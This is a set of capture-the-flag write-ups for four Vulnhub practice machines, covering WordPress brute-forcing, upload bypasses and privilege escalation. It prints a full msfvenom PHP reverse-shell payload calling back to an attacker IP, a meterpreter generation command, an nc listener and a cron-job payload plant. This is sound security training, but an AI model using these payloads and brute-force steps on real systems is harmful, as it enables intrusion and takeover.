Tommy Boy: 1

Huge thanks to Brian Johnson for this fun vm

Vulnhub

As usual we start with an nmap scan

Everytime I see a website i run dirb and nikto on it ,but the first thing i check is the robots.txt

from the robots.txt we can see

/flag-numero-uno.txt

Browsing to the url http://192.168.0.102/flag-numero-uno.txt

This is the first of five flags in the Callhan Auto server. You'll need them all to unlock
the final treasure and fully consider the VM pwned!

Flag data: B34rcl4ws

Checking the Webpage

Checking the source code of the page reveal an interesting youtube video.

Browsing the youtube video reveal the word prehistoric forest

We can try to fetch http://192.168.0.102/prehistoricforest/
This is a wordpress server!

From enumerating manually the server we can see there is a comment that require a password that has been set by richard

Richard, what’s the password you put on that protected blog post?

Also its a wordpress so lets check if there are any vulnerabilities

So we run wpscan on it.

From enumerating we can see some users and can try to bruteforce their password.

wpscan -u 192.168.0.102/prehistoricforest/ --enumerate u

[+] Identified the following 4 user/s:
+----+----------+-------------------+
| Id | Login | Name |
+----+----------+-------------------+
| 1 | richard | richard |
| 2 | tom | Big Tom |
| 3 | tommy | Tom Jr. |
| 4 | michelle | Michelle Michelle |
+----+----------+-------------------+
wpscan -u 192.168.0.102/prehistoricforest/ --username tom --wordlist usr/share/wordlists/rockyou.txt

We bruteforce the user tom and password is tomtom1

On the wordpress there is the FLag#2 thisisthesecondflagyayyou.txt

curl http://192.168.0.102/prehistoricforest/thisisthesecondflagyayyou.txt
You've got 2 of five flags - keep it up!

Flag data: Z4l1nsky

 

From enumerating the wordpress we can see that tom left a message to try to remember his password

Because we know the second part for his ssh password

I used these commands to generate a list of valid password because i did’nt know the password length i would need to generate all wordlist by hand.

crunch 9 9 -t '@@@1938!!' -o tommy.txt
hydra -l tom -P tommy.txt 192.168.0.102 ssh -V

While this was bruteforcing the user tom on ssh, i enumerated the wordpress more.

There was a reference to the richard directory on the website, wich had a picture of Richard

http://192.168.0.102/prehistoricforest/richard/

running exiftool on shockedrichard revealed

User Comment : ce154b5a8e59c89732bc25d6a2e6b90b

Quick googling for this hash revealed the password is spanky

There was a wordpress comment that needed a password to be seen. When i tried spanky the following comment was available to read.

Michelle/Tommy,This is f’d up.I am currently working to restore the company’s online ordering system, but we are having some problems getting it restored from backup. Unfortunately, only Big Tom had the passwords to log into the system. I can’t find his passwords anywhere. All I can find so far is a note from our IT guy Nick (whose last day was yesterday) saying:Hey Richy,So you asked me to do a write-up of everything I know about the Callahan server so the next moron who is hired to support you idiots can get up to speed faster.Here’s everything I know:

You guys are all hopeless sheep :-/ The Callahan Auto Web site is usually pretty stable. But if for some reason the page is ever down, you guys will probably go out of business. But, thanks to *me* there’s a backup called callahanbak.bak that you can just rename to index.html and everything will be good again. IMPORTANT: You have to do this under Big Tom’s account via SSH to perform this restore. Warning: Big Tom always forgets his account password. Warning #2: I screwed up his system account when I created it on the server, so it’s not called what it should be called. Eh, I can’t remember (don’t care) but just look at the list of users on the system and you’ll figure it out.

I left a few other bits of information in my home folder, which the new guy can access via FTP. Oh, except I should mention that the FTP server is super flaky and I haven’t had the time (i.e. I don’t give a fat crap) to fix it. Basically I couldn’t get it running on the standard port, so I put it on a port that most scanners would get exhausted looking for. And to make matters more fun, the server seems to go online at the top of the hour for 15 minutes, then down for 15 minutes, then up again, then down again. Now it’s somebody else’s problem (did I mention I don’t give a rat’s behind?).

You asked me to leave you with my account password for the server, and instead of laughing in your face (which is what I WANTED to do), I just reset my account (“nickburns” in case you’re dumb and can’t remember) to a very, VERY easy to guess password. I removed my SSH access because I *DON’T* want you calling me in case of an emergency. But my creds still work on FTP. Your new fresh fish can connect using my credentials and if he/she has half a brain.

Good luck, schmucks!

LOL

-Nick

 

Michelle/Tommy…WTF are we going to do?!?! If this site stays down, WE GO OUT OF BUSINESS!!!1!!1!!!!!!!

-Richard

From previous scanning we know there is a port running on port 8008 it is the Nick’s web server.

We can now fetch http://192.168.0.102:8008/NickIzL33t/

But on this page there is nothing, but a hint ( Only me and Steve Jobs can see this content)

So i changed my useragent to something apple related ( I used a firefox addon for conveniance but i tested the user agent with burpsuite)

Apple-iPhone/501.347

With this useragent i managed to fetch the webpage NickIzL33t only to tell me i would need to know the webpage ending in .html .

So i fired up dirbuster to try and fetch the .html but dirbuster always seemed to crash with the rockyou.txt wordlist.
So i used burpsuite to bruteforce the .html and i found that the hidden html is fallon1.html

we can download the hint to crack the zip file, the zipfile and the 3rd flag!.

http://192.168.0.102:8008/NickIzL33t/flagtres.txt

THREE OF 5 FLAGS - you're awesome sauce.

Flag data: TinyHead

From checking the source we can see there is a link to an upload image.

http://192.168.0.102:8008/NickIzL33t/P4TCH_4D4MS/upload.php

If we just rename our php file to .gif we can upload directly on the server and have code execution 🙂

For cracking the zip file earlier found

crunch 13 13 -t bev,%%@@^1995 -o tomwlist.txt

This will create a wordlist with that would fit the description of nick

fcrackzip -D -p ./Nick/tomwlist.txt -u t0msp4ssw0rdz.zip -v

unzipping the zip gives us a file passwords.txt containing

Sandusky Banking Site
------------------------
Username: BigTommyC
Password: money

TheKnot.com (wedding site)
---------------------------
Username: TomC
Password: wedding

Callahan Auto Server
----------------------------
Username: bigtommysenior
Password: fatguyinalittlecoat

Note: after the "fatguyinalittlecoat" part there are some numbers, but I don't remember what they are.
However, I wrote myself a draft on the company blog with that information.

Callahan Company Blog
----------------------------
Username: bigtom(I think?)
Password: ???
Note: Whenever I ask Nick what the password is, he starts singing that famous Queen song.

since we already know the second part of the password “1938!!” (from the wordpress post)

we can login with the user bigtommysenior and password “fatguyinalittlecoat1938!!”

ssh bigtommysenior@192.168.0.102 (password = fatguyinalittlecoat1938!! )

Once we loggin into the ssh

cat el-flag-numero-quatro.txt
YAY! Flag 4 out of 5!!!! And you should now be able to restore the Callhan Web server to normal
working status.

Flag data: EditButton

But...but...where's flag 5?

I'll make it easy on you. It's in the root of this server at /5.txt

I quickly checked if my user had access but the file is owned by www-data and since i already uploaded a malicious php i already have a shell as www-data from the image upload bypass 🙂

 

cat .5.txt
FIFTH FLAG!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
YOU DID IT!!!!!!!!!!!!!!!!!!!!!!!!!!!!
OH RICHARD DON'T RUN AWAY FROM YOUR FEELINGS!!!!!!!!

Flag data: Buttcrack

Ok, so NOW what you do is take the flag data from each flag and blob it into one big chunk.
So for example, if flag 1 data was "hi" and flag 2 data was "there" and flag 3 data was "you"
you would create this blob:

hithereyou

Do this for ALL the flags sequentially, and this password will open the loot.zip in Big Tom's
folder and you can call the box PWNED.

So we just need to concatenate all flags 🙂

1st Flag : B34rcl4ws # From robots.txt
2nd Flag : Z4l1nsky # From WordPress
3rd Flag : TinyHead # From Nick’s web service
4th Flag : EditButton #From SSH
5th Flag : Buttcrack #From Getting a shell as www-data

So the Password for the LOOT.zip should be

B34rcl4wsZ4l1nskyTinyHeadEditButtonButtcrack

unzip LOOT.ZIP
Archive: LOOT.ZIP
[LOOT.ZIP] THE-END.txt password:
inflating: THE-END.txt
bigtommysenior@CallahanAutoSrv01:~$ cat THE-END.txt
YOU CAME.
YOU SAW.
YOU PWNED.

Thanks to you, Tommy and the crew at Callahan Auto will make 5.3 cajillion dollars this year.

GREAT WORK!

I'd love to know that you finished this VM, and/or get your suggestions on how to make the next
one better.

Please shoot me a note at 7ms @ 7ms.us with subject line "Here comes the meat wagon!"

Or, get in touch with me other ways:

* Twitter: @7MinSec
* IRC (Freenode): #vulnhub (username is braimee)

Lastly, please don't forget to check out www.7ms.us and subscribe to the podcast at
bit.ly/7minsec

Thanks and have a blessed week!

-Brian Johnson
7 Minute Security

Fun VM

What i learned,
1. I learned some new options in dirbuster for bruteforcing only .html and adding a user agent.
2. I learned how to use crunch efficiently to generate a custom wordlist that fits my needs
3. I learned how to use burpsuite as a bruteforcer that you completely have the control

Thank you for reading this!

Mr Robot

This is my write-up for Mr Robot vm on vulnhub

Link To Vulnhub

As usual we start with a good old nmap scan 🙂

nmap 192.168.0.97 -A -p - -T5

Starting Nmap 7.12 ( https://nmap.org ) at 2016-07-01 20:00 EDT
Nmap scan report for linux (192.168.0.97)
Host is up (0.00051s latency).
Not shown: 65532 filtered ports
PORT    STATE  SERVICE  VERSION
22/tcp  closed ssh
80/tcp  open   http     Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open   ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03
MAC Address: 08:00:27:38:35:A7 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.1
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.51 ms linux (192.168.0.97)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 70.40 seconds

Checking the robots.txt revealed a dictionary and the first key.

User-agent: *
fsocity.dic
key-1-of-3.txt

curl 192.168.0.97/key-1-of-3.txt
073403c8a58a1f80d943455fb30724b9

wget 192.168.0.97/fsocity.dic

Because the dictionary have multiple entry i needed to sort it and remove the duplicate

cat fsocity.dic | sort -u > fsociety.lst

There is a web server running we start dirb and nikto to learn more about the web servers.

We can see there is a wordpress running on the server.

wpscan -u http://192.168.0.97/ --wordlist /root/Dropbox/Vulnhub/MrRobot/fsocity.dic --username user 

I first used user as the user to bruteforce because on the website it say welcome to user’s wordpress.

But since it didnt work i had to think about different user this wordpress would have, since the name of the vm is Mr Robot and the main character of Mr Robot is called Elliot, i had to try with this user also.

wpscan -u http://192.168.0.97/ --wordlist /root/Dropbox/Vulnhub/MrRobot/fsociety.lst --username Elliot

Brute Forcing 'Elliot' Time: 00:02:54  (5636 / 11452) 49.21%  ETA: 00:03:00
  +----+--------+------+-----------+
  | Id | Login  | Name | Password  |
  +----+--------+------+-----------+
  |    | Elliot |      | ER28-0652 |
  +----+--------+------+-----------+

We can now login in the wordpress and change the content of 404.php to any php code of our liking
I used this php code which is generate by msfvenom


/*<?php /**/ error_reporting(0); $ip = '192.168.0.181'; $port = 443; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } elseif (($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } elseif (($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } else { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; eval($b); die();

curl 192.168.0.97/404.php

Get a shell as the user deamon

with the shell we can see the user robot in /home/robot
ls -larth
total 16K
drwxr-xr-x 3 root root 4.0K Nov 13 2015 ..
drwxr-xr-x 2 root root 4.0K Nov 13 2015 .
-r——– 1 robot robot 33 Nov 13 2015 key-2-of-3.txt
-rw-r–r– 1 robot robot 39 Nov 13 2015 password.raw-md5
robot@linux:~$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959
robot@linux:~$ cat password.raw-md5
cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
a quick google search with the hash gives us http://md5cracker.org/decrypted-md5-hash/c3fcd3d76192e4007dfb496cca67e13b

so we can switch user with su robot
password is abcdefghijklmnopqrstuvwxyz

from enumerating the system we can see there is a config file for the server with the database password in it, and the ftp user and password.
define(‘FS_METHOD’, ‘ftpext’);
define(‘FTP_BASE’, ‘/opt/bitnami/apps/wordpress/htdocs/’);
define(‘FTP_USER’, ‘bitnamiftp’);
define(‘FTP_PASS’, ‘inevoL7eAlBeD2b5WszPbZ2gJ971tJZtP0j86NYPyh6Wfz1x8a’);
define(‘FTP_HOST’, ‘127.0.0.1’);
define(‘FTP_SSL’, false);

and the database configuration

/** The name of the database for WordPress */
define(‘DB_NAME’, ‘bitnami_wordpress’);

/** MySQL database username */
define(‘DB_USER’, ‘bn_wordpress’);

/** MySQL database password */
define(‘DB_PASSWORD’, ‘570fd42948’);

/** MySQL hostname */
define(‘DB_HOST’, ‘localhost:3306’);

With the ftp user i can read and write as the user but that didn’t help me get a root shell even tho there is a crontab running that use the bitnami user for it.

What ended me the root shell is i realized i was using nmap as a non root user but nmap still run as root!
nmap got an interactive option that can grant you a shell to get it just type.

nmap –interactive
!sh
There we got the root shell! 🙂

cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
# whoami
whoami
root

Thank you for reading this 🙂

nmap installed on the box and user robot is allowed to scan with it, so i did a bunch of scans locally to discover that there is an ftp service running on the box.

nc -v

nc -v 127.0.0.1 21
nc -v 127.0.0.1 21
Connection to 127.0.0.1 21 port [tcp/ftp] succeeded!
220 (vsFTPd 3.0.2)
USER bitnamiftp
USER bitnamiftp
331 Please specify the password.
PASS inevoL7eAlBeD2b5WszPbZ2gJ971tJZtP0j86NYPyh6Wfz1x8a
PASS inevoL7eAlBeD2b5WszPbZ2gJ971tJZtP0j86NYPyh6Wfz1x8a
230 Login successful.
CWD bitnami
CWD bitnami
250 Directory successfully changed.
CWD stats
CWD stats
550 Failed to change directory.
CWD /opt/bitnami/stats
CWD /opt/bitnami/stats
250 Directory successfully changed.
PASV
PASV
227 Entering Passive Mode (127,0,0,1,41,198).
LIST -l
LIST -l
150 Here comes the directory listing.
226 Directory send OK.
STOR ./agent.bin
STOR ./agent.bin
425 Use PORT or PASV first.
PASV
PASV
227 Entering Passive Mode (127,0,0,1,138,47).
STOR /opt/bitnami/stats/agent.bin
STOR /opt/bitnami/stats/agent.bin
425 Failed to establish connection.

PASV
PASV
227 Entering Passive Mode (127,0,0,1,34,208).
STOR /opt/bitnami/stats/agent.bin
STOR /opt/bitnami/stats/agent.bin
150 Ok to send data.
226 Transfer complete.
421 Timeout.
nc -v 127.0.0.1 35375 < /tmp/vipermeter.elf
#This will transfer the vipermeter.elf to agent.bin with is executed in the crontab at every hours finishing ith 55 minutesx

to get a shell as root
nmap –interactive
!sh

tr0ll

Okay this is a new box so we need to run nmap on the box 🙂
There is three ports open, 21, 22 and 80.
The website just trolls us.
The ftp is anonymous readable so we can check if there is something there.
There is a file named lol.pcap. This is interesting.
The pcap is someone connecting to the ftp and downloading super_secret.txt
Since the ftp protocol is not encrypted we can see the content of the file downloaded 🙂

In wireshark just go. Statistics > Conversations > TCP
You can see there is 4 tcp conversation. we one we are interested in is the 3rd.

This gives us the content of the file:
Well, well, well, aren’t you just a clever little devil, you almost found the sup3rs3cr3tdirlol 😛

Sucks, you were so close… gotta TRY HARDER!
.
we need to find the sup3rs3cr3tdirlol
just go browse http://192.168.0.59/sup3rs3cr3tdirlol/
You can download a 32 bit executable roflmao there and run it.
When the program is run it prints out this : Find address 0x0856BF to proceed
This could normally be a memory address but since we cant read the memory on the target it must be something else.
This could be a browser address !
Browsing to http://192.168.0.59/0x0856BF/
Gives us 2 folders. Good_luck and this_folder_contains_the_password
The first gives us a list of username.
maleus
ps-aux
felux
Eagle11
genphlux < — Definitely not this one
usmc8892
blawrg
wytshadow
vis1t0r
overflow

The second gives us a file named Pass.txt containing Good_job_:).
Since this is a troll machine we need to take this literally. The folder contain the file named Pass.txt.
I created two file one with list of users and one with a list of passwords.

hydra -L user -P password -V 192.168.0.59 ssh -t 1

By bruteforcing with hydra we found the real password to log into ssh was overflow // Pass.txt
[22][ssh] host: 192.168.0.59 login: overflow password: Pass.txt
Now we need to do a lot of enumeration, Best guide i have is from g0tmi1k
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
By checking all the config file, i finally came accros something that looked strange.
in /lib/log There was a folder named cleaner.py, this is why we get our stuff deleted in /tmp
But this file is writable by anyone! and root execute it sometimes to clean the /tmp directory.
I used this python shell to give me a shell as root:
https://www.trustedsec.com/files/RevShell_PoC_v1.py
I just replaced it with this script to get a root reverse shell 😛
you just need to listen for the incoming connection like this.

nc -lnvp 443

Since you are root you can read the content of /root/proof.txt
Good job, you did it!
702a8c18d29c6f3ca0d99ef5712bfbdc

SickOS

SickOS

I Hacked SickOS VM on vulnhub.com, Here is how a did it.

I Started by doing a nmap scan on the box

There is a squid running on the box.
A squid server is a proxy server so lets configure our browser to pass by the proxy
Once you set the proxy you can browse to the real website at http://192.168.101.229/ . The reason for this is because the website if not open from the outside, by using its own proxy we can reach the web server.

http://192.168.101.229/robots.txt
in the robots.txt there is a fileda called /wolfcms/
naturally we check on exploit-db if there are a version vulnerable to help us attacking the system.
Exploit-DB Exploit
From there i saw the path to the admin web panel.
“GET {$path}/?/admin/plugin/file_manager HTTP/1.1rn”;
So we browse http://192.168.101.229/wolfcms/?/admin/
We are granted a login page.
I googled for the default password for wolfcms wich is admin // admin.
In the web application there is a way to upload a file.

Lets generate a php meterpreter so that we have a shell access on the system.

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.101.3 LPORT=443 -o phpmeter.php

If we upload the phpmeter.php
we can fetch it using http://192.168.101.229/public/phpmeter.php
This gives us a reverse shell as www-data.

python -c 'import pty;pty.spawn(a"/bin/bash")'

From this shell we can read the configuration of the web server including, the root password for mysql.
in /var/www/wolfcmd/config.php we can see the database configuration

// Database settings:
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'john@123');
define('TABLE_PREFIX', '');

So the root password for the database is john@123
By doing some enumeration on the system we can see there is an additional user named sickos, we can read the file at /etc/passwd or ls /home/
#People tend to reuse their password so we can try to log with the sickos user,
su sickos and password john@123
#Since the person who created this wasn’t careful about security, this is the default account he created, by default the main account is member of sudoers.
his means we can run any command as root on the system.
We can verify if we are in the sudoers group by doing this command.

sudo -l

User sickos may run the following commands on this host:
(ALL : ALL) ALL

This means we can switch user and login as the root account with the password john@123
sudo su to get a shell as root!

cat /root/a0216ea4d51874464078c618298b1367.txt

'If you are viewing this!!

ROOT!

You have Succesfully completed SickOS1.1.
Thanks for Trying